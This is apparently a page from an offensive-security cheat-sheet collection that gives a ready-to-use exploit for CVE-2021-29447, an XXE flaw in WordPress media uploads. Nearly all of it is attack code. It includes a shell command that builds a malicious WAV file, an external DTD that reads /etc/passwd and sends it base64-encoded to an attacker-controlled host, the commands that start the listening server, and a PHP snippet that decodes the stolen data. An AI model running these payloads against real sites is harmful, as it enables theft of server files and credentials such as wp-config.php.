killchain-compendium/exploit/web/xxe/wp_xxe_.md

923 B

CVE-2021-29447

  • Upload of wav file has following consequences
    • Arbitrary File Disclosure for example wp-config.php
    • Server Side Request Forgery

Usage

  • Create wav Payload
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
  • Create dtd Payload, which is downloaded from attacker machine by the wp instance. Following payload
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
  • Launch http server
php -S 0.0.0.0:8000
python -m http.server
  • Copy returned base64 into php file
<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?>